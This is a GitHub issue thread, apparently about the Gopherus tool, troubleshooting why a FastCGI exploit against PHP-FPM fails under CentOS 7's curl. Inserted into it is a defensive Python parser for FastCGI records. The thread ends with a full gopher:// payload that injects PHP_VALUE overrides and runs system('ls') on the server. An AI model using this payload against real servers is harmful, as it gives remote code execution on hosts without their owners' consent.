fastcgi exploit not executing successfully - CentOS 7 #5
I've been testing the fastcgi exploit in a local VM but unable to get it to work.
PHP-FPM is listening on port 9000
I've generated the payload and executed as follows
curl just hangs until I eventually send it a SIGINT.
Any help would be much appreciated.
I used tcpdump to capture the activity with the curl and compared it to a tcpdump when accessing a webpage in Wireshark. It seems the packets are not being considered properly formed fastcgi. On the page that's working the 4th packet shows in Wireshark as "FCGI_BEGIN_REQUEST", however when sending the payload generated here it says "TCP segment of a reassembled PDU"
Telnet connects fine.
I'm thinking it may actually be an issue with the cURL version I'm using. I looked at the tcp packet in Wireshark more closely and found that it only contains the 01 01 in the FCGI_BEGIN_REQUEST and then gets cut off (you'll notice the length is 68 of the curl that isn't working whereas it's 82 when I have the request get delivered via Apache mod_proxy_fcgi). It seems like curl is not delivering the TCP packets to fastcgi as expected.
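The framing the comment above describes (a stream that begins `01 01` and is then cut off at the first NUL, so Wireshark no longer sees an FCGI_BEGIN_REQUEST) can be checked without Wireshark. The following is an added example, not part of this issue or of the Gopherus project: a small FastCGI record walker that reports whether a byte stream is a complete record sequence or is truncated, decodes the FCGI_PARAMS name-value pairs, and, from the PHP-FPM operator's side, flags any PHP_VALUE / PHP_ADMIN_VALUE overrides arriving in a request, since a web server front end never needs to send those. The sample stream is constructed here (a plain GET for /var/www/index.php), and the record and pair encoders are written from the FastCGI specification, not taken from the project.

```python
import struct

# FastCGI record types used here (values from the FastCGI specification)
FCGI_BEGIN_REQUEST, FCGI_PARAMS, FCGI_STDIN = 1, 4, 5
RECORD_NAMES = {1: "FCGI_BEGIN_REQUEST", 4: "FCGI_PARAMS", 5: "FCGI_STDIN"}
FCGI_RESPONDER = 1


def _record(rtype, content, req_id=1):
    """Frame one record: version 1, 8-byte header, content, no padding."""
    return struct.pack(">BBHHBB", 1, rtype, req_id, len(content), 0, 0) + content


def _nv_pair(name, value):
    """Encode one name-value pair with 1-byte lengths (both < 128 here)."""
    return bytes([len(name), len(value)]) + name + value


# Constructed sample: a benign request, the same record layout a front end
# like mod_proxy_fcgi would send for a GET to /var/www/index.php.
SAMPLE_STREAM = (
    _record(FCGI_BEGIN_REQUEST, struct.pack(">HB5x", FCGI_RESPONDER, 0))
    + _record(FCGI_PARAMS,
              _nv_pair(b"SCRIPT_FILENAME", b"/var/www/index.php")
              + _nv_pair(b"REQUEST_METHOD", b"GET"))
    + _record(FCGI_PARAMS, b"")   # empty PARAMS record ends the parameter stream
    + _record(FCGI_STDIN, b"")    # empty STDIN record ends the request body
)


def parse_records(data):
    """Walk the stream record by record.

    Returns (records, truncated): records is a list of (type_name, content),
    truncated is True when the stream ends inside a header or a record body,
    which is exactly what a NUL-cut stream like b"\\x01\\x01" looks like."""
    records, pos = [], 0
    while pos < len(data):
        if len(data) - pos < 8:
            return records, True
        _ver, rtype, _rid, clen, plen, _ = struct.unpack(">BBHHBB", data[pos:pos + 8])
        end = pos + 8 + clen + plen
        if end > len(data):
            return records, True
        records.append((RECORD_NAMES.get(rtype, "type %d" % rtype),
                        data[pos + 8:pos + 8 + clen]))
        pos = end
    return records, False


def _read_len(buf, pos):
    """Length prefix: 1 byte if the high bit is clear, else 4 bytes masked to 31 bits."""
    if buf[pos] & 0x80 == 0:
        return buf[pos], pos + 1
    return struct.unpack(">I", buf[pos:pos + 4])[0] & 0x7FFFFFFF, pos + 4


def parse_params(content):
    """Decode an FCGI_PARAMS body into a dict of name -> value."""
    params, pos = {}, 0
    while pos < len(content):
        nlen, pos = _read_len(content, pos)
        vlen, pos = _read_len(content, pos)
        name = content[pos:pos + nlen].decode("latin-1")
        pos += nlen
        params[name] = content[pos:pos + vlen].decode("latin-1")
        pos += vlen
    return params


def ini_override_params(params):
    """Operator-side check: php.ini overrides pushed by the client are not
    something a normal web server front end sends, so their presence on an
    exposed PHP-FPM port is worth alerting on."""
    return sorted(k for k in params if k in ("PHP_VALUE", "PHP_ADMIN_VALUE"))


if __name__ == "__main__":
    full, cut = parse_records(SAMPLE_STREAM), parse_records(SAMPLE_STREAM[:SAMPLE_STREAM.index(b"\x00")])
    print("complete stream:", [name for name, _ in full[0]], "truncated:", full[1])
    print("NUL-cut stream:", [name for name, _ in cut[0]], "truncated:", cut[1])
    print("params:", parse_params(full[0][1][1]))
```

Feeding it the bytes actually captured on the wire (e.g. the TCP payload exported from Wireshark) distinguishes "curl sent a malformed stream" from "PHP-FPM rejected a well-formed one": the first case returns `truncated == True` with no records decoded, the second returns the full record list.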
Out of curiosity, which Linux distro / curl version are you testing?
Here are the specs of where I'm testing:
Payload worked on my Mac, so definitely seems to be an issue with the CentOS environment I was testing in / version of cURL.
I've changed the title of the issue to note that it seems to be specific to CentOS (7) and curl that comes with CentOS 7. Not sure if you want to keep this issue open or not?
It works after upgrading curl with these instructions:
[vagrant@localhost Gopherus]$ curl gopher://127.0.0.1:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%0D%05%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%02CONTENT_LENGTH54%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%20SCRIPT_FILENAME/home/vagrant/Gopherus/index.php%0D%01DOCUMENT_ROOT/%00%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%006%04%00%3C%3Fphp%20system%28%27ls%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00 --output -
File not found.